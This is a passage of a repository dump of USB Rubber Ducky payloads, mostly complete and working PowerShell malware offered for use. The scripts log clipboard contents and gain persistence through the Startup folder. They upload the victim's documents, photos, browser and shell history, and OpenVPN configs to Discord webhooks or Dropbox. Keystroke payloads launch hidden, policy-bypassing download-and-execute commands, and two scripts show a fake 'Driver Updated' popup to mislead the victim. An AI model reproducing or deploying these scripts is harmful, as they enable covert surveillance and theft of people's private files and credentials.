downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, waiting for a Ctrl + C or Ctrl + X click \n\nThen the contents will then be sent to the discord webhook for viewing pleasure\n\nFor killing the script press both Ctrl buttons at the same time [It will resume at reboot]\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Copy-And-Waste/c.ps1",
    "content": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n  [CmdletBinding()]\r\n  param (    \r\n  [Parameter (Position=0,Mandatory = $True)]\r\n  [string]$con\r\n  ) \r\n  \r\n  $hookUrl = 'YOUR DISCORD WEBHOOK'\r\n  \r\n$Body = @{\r\n  'username' = $env:username\r\n  'content' = $con\r\n}\r\n\r\n\r\nInvoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body\r\n\r\n}\r\n\r\n\r\ndischat (get-clipboard)\r\n\r\nwhile (1){\r\n    $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')\r\n    $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)\r\n    $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)\r\n    $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)\r\n\r\n       if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}\r\n       elseif ($Rctrl -and $Lctrl) {dischat \"---------connection lost----------\";exit}\r\n       else {continue}\r\n} "
  },
  {
    "path": "RubberDucky/payloads/Copy-And-Waste/payload.txt",
    "content": "REM     Title: Copy-And-Waste\r\n\r\nREM     Author: atomiczsec & I am Jakoby\r\n\r\nREM     Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook\r\n\r\nREM     Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI\r\nDELAY\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\n\r\nREM     Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM     Also remember to put in your discord webhook in c.ps1\r\nREM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH"
  },
  {
    "path": "RubberDucky/payloads/Copy-And-Waste/placeholder",
    "content": "\n"
  },
  {
    "path": "RubberDucky/payloads/De-Bloater/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;De-Bloater!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# De-Bloater\n\nA payload to quickly get \"Windows10Debloater\"\n\n## Description\nThis script will download \"Windows10Debloater\" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10 \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n```\niwr -useb https://git.io/debloat|iex\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n[Sycnex](https://github.com/Sycnex/Windows10Debloater)\n\n[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Doc-Hog/d.ps1",
    "content": "function Doc-Hog {\n    [CmdletBinding()]\n    param (\n        [parameter(Position=0,Mandatory=$False)]\n        [string]$file,\n        [parameter(Position=1,Mandatory=$False)]\n        [string]$text \n    )\n\n    $hookurl = 'DISCORD-WEBHOOK'\n\n    $Body = @{\n      'username' = $env:username\n      'content' = $text\n    }\n\n    if (-not ([string]::IsNullOrEmpty($text))) {\n        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)\n    }\n\n    if (-not ([string]::IsNullOrEmpty($file))) {\n        curl.exe -F \"file1=@$file\" $hookurl\n    }\n}\n\n$Files = Get-ChildItem -Path \"$env:HOMEPATH\" -Include \"*.docx\",\"*.doc\",\"*.pptx\",\"*.xlsx\",\"*.pdf\",\"*.jpeg\",\"*.png\",\"*.jpg\",\"*.csv\",\"*.txt\" -Recurse\n\n$types = @{\n    \"*.docx\" = \"Word\";\n    \"*.doc\" = \"Word\";\n    \"*.pptx\" = \"PowerPoint\";\n    \"*.xlsx\" = \"Excel\";\n    \"*.pdf\" = \"PDF\";\n    \"*.jpeg\" = \"JPEG\";\n    \"*.png\" = \"PNG\";\n    \"*.jpg\" = \"JPEG\";\n    \"*.csv\" = \"CSV\";\n    \"*.txt\" = \"Text\";\n}\n\nforeach ($type in $types.Keys) {\n    $filteredFiles = $Files | Where-Object {$_.Name -like $type}\n\n    if ($filteredFiles) {\n        $zipFile = \"$env:TEMP\\$($types[$type]).zip\"\n\n        $filteredFiles | Compress-Archive -DestinationPath $zipFile\n\n        Doc-Hog -file $zipFile -text \"Uploading $($types[$type]) files\"\n    }\n}\n"
  },
  {
    "path": "RubberDucky/payloads/Doc-Hog/payload.txt",
    "content": "REM     Title: Doc-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\nDEFINE URL http://new-url.com/powershell.ps1\r\n\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "RubberDucky/payloads/Doc-Hog/readme.md",
    "content": "\r\n<h1 align=\"center\">\r\n  <a href=\"https://git.io/typing-svg\">\r\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈&center=true&size=30\">\r\n  </a>\r\n</h1>\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details>\r\n  <summary>Table of Contents</summary>\r\n  <ol>\r\n    <li><a href=\"#Description\">Description</a></li>\r\n    <li><a href=\"#getting-started\">Getting Started</a></li>\r\n    <li><a href=\"#Contributing\">Contributing</a></li>\r\n    <li><a href=\"#Version-History\">Version History</a></li>\r\n    <li><a href=\"#Contact\">Contact</a></li>\r\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\r\n  </ol>\r\n</details>\r\n\r\n# Doc-Hog\r\n\r\nA payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV\r\n\r\n## Description\r\n\r\nThis payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\n## Getting Started\r\n\r\n### Dependencies\r\n\r\n* DropBox or other file sharing service - Your Shared link for the intended file\r\n* Windows 10,11\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n### Executing program\r\n\r\n* Plug in your device\r\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\r\n```\r\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\r\n```\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Contributing\r\n\r\nAll contributors names will be listed here\r\n\r\natomiczsec\r\nI am Jakoby\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Version History\r\n\r\n* 0.1\r\n    * Initial Release\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- CONTACT -->\r\n## Contact\r\n\r\n<div align=\"center\">\r\n  <a href=\"https://lnk.bio/atomiczsec\">\r\n    <img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg\" width=\"48\" height=\"48\" alt=\"Link\" />\r\n  </a>\r\n</div>\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- ACKNOWLEDGMENTS -->\r\n## Acknowledgments\r\n\r\n* [Hak5](https://hak5.org/)\r\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>"
  },
  {
    "path": "RubberDucky/payloads/History-Pig/HP.ps1",
    "content": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The Chrome History file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Chrome History to Temp Directory to get sent to Dropbox\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history\"\r\n     Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -PathType Leaf)) {\r\n    try {\r\n        Write-Host \"The Edge History file has not been found. \"\r\n    }\r\n    catch {\r\n        throw $_.Exception.Message\r\n    }\r\n}\r\n # Copy Edge History to Temp Directory to get sent to Dropbox\r\n else {\r\n    $F2 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history\"\r\n    Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -Destination \"$env:tmp/$F2\" \r\n}\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"ADD-YOUR-DROPBOX-TOKEN-HERE\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nDropBox-Upload -f \"$env:tmp/$F2\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "RubberDucky/payloads/History-Pig/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# History-Pig\n\nA payload to exfiltrate the history of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the history\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/History-Pig/payload.txt",
    "content": "REM     Title: History-Pig\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate browsers history to a dropbox\r\n\r\nREM     Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "RubberDucky/payloads/OVPN-Hog/o.ps1",
    "content": "function OVPN-Hog {\n    [CmdletBinding()]\n    param (\n        [parameter(Position=0,Mandatory=$False)]\n        [string]$file,\n        [parameter(Position=1,Mandatory=$False)]\n        [string]$text \n    )\n\n    $hookurl = 'DISCORD-WEBHOOK'\n\n    $Body = @{\n        'username' = $env:username\n        'content' = $text\n    }\n\n    if (-not ([string]::IsNullOrEmpty($text))) {\n        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)\n    }\n\n    if (-not ([string]::IsNullOrEmpty($file))) {\n        curl.exe -F \"file1=@$file\" $hookurl\n    }\n}\n\n$Drive = \"C:\"\n\n$Files = Get-ChildItem -Path $Drive -Filter \"*.ovpn\" -File -Recurse\n\nif ($Files) {\n    $types = @{\n        \"*.ovpn\" = \"OpenVPN\"\n    }\n\n    foreach ($type in $types.Keys) {\n        $filteredFiles = $Files | Where-Object { $_.Name -like $type }\n\n        if ($filteredFiles) {\n            $zipFile = Join-Path -Path $env:TEMP -ChildPath \"$($types[$type]).zip\"\n\n            $filteredFiles | Compress-Archive -DestinationPath $zipFile\n\n            OVPN-Hog -file $zipFile -text \"Uploading $($types[$type]) files\"\n        }\n    }\n}\n"
  },
  {
    "path": "RubberDucky/payloads/OVPN-Hog/payload.txt",
    "content": "REM     Title: Doc-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will enumerate through the files looking for \".ovpn\" files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\nDEFINE URL http://new-url.com/powershell.ps1\r\n\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "RubberDucky/payloads/OVPN-Hog/readme.md",
    "content": "<h1 align=\"center\">\r\n  <a href=\"https://git.io/typing-svg\">\r\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈&center=true&size=30\">\r\n  </a>\r\n</h1>\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details>\r\n  <summary>Table of Contents</summary>\r\n  <ol>\r\n    <li><a href=\"#Description\">Description</a></li>\r\n    <li><a href=\"#Getting-Started\">Getting Started</a></li>\r\n    <li><a href=\"#Contributing\">Contributing</a></li>\r\n    <li><a href=\"#Version-History\">Version History</a></li>\r\n    <li><a href=\"#Contact\">Contact</a></li>\r\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\r\n  </ol>\r\n</details>\r\n\r\n# OVPN-Hog\r\n\r\nA PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).\r\n\r\n## Description\r\n\r\nThis script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.\r\n\r\n## Getting Started\r\n\r\n### Dependencies\r\n\r\n* DropBox or other file sharing service - Your Shared link for the intended file\r\n* Windows 10,11\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n### Executing program\r\n\r\n* Plug in your device\r\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\r\n```\r\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\r\n```\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Contributing\r\n\r\nAll contributors names will be listed here\r\n\r\natomiczsec\r\n\r\nI am Jakoby\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Version History\r\n\r\n* 0.1\r\n    * Initial Release\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- CONTACT -->\r\n## Contact\r\n\r\n<div align=\"center\">\r\n  <a href=\"https://lnk.bio/atomiczsec\">\r\n    <img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg\" width=\"48\" height=\"48\" alt=\"Link\" />\r\n  </a>\r\n</div>\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- ACKNOWLEDGMENTS -->\r\n## Acknowledgments\r\n\r\n* [Hak5](https://hak5.org/)\r\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>"
  },
  {
    "path": "RubberDucky/payloads/Picture-Hog/p.ps1",
    "content": "function Upload-Discord {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n    [parameter(Position=0,Mandatory=$False)]\r\n    [string]$file,\r\n    [parameter(Position=1,Mandatory=$False)]\r\n    [string]$text \r\n)\r\n\r\n$hookurl = 'YOUR-DISCORD-WEBHOOK'\r\n\r\n$Body = @{\r\n  'username' = $env:username\r\n  'content' = $text\r\n}\r\n\r\nif (-not ([string]::IsNullOrEmpty($text))){\r\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};\r\n\r\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\r\n}\r\n\r\n\r\n# Enumerate all .png and .jpg files in the current user's home directory and all subdirectories\r\n$Files = Get-ChildItem -Path \"$env:HOMEPATH\" -Include \"*.png\",\"*.jpg\" -Recurse\r\n\r\n# Iterate through each file\r\nforeach ($File in $Files)\r\n{\r\n    # Get the file name and file path\r\n    $FileName = $File.Name\r\n    $FilePath = $File.FullName\r\n\r\n    # Call the Upload-Discord function, passing the file path and file name as arguments\r\n    Upload-Discord -file $FilePath\r\n}\r\n"
  },
  {
    "path": "RubberDucky/payloads/Picture-Hog/placeholder",
    "content": "\n"
  },
  {
    "path": "RubberDucky/payloads/Powershell-History/PH.ps1",
    "content": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The Powershell History file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Powershell History to Temp Directory to get sent to Dropbox\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt\"\r\n     Copy-Item \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "RubberDucky/payloads/Powershell-History/README.md",
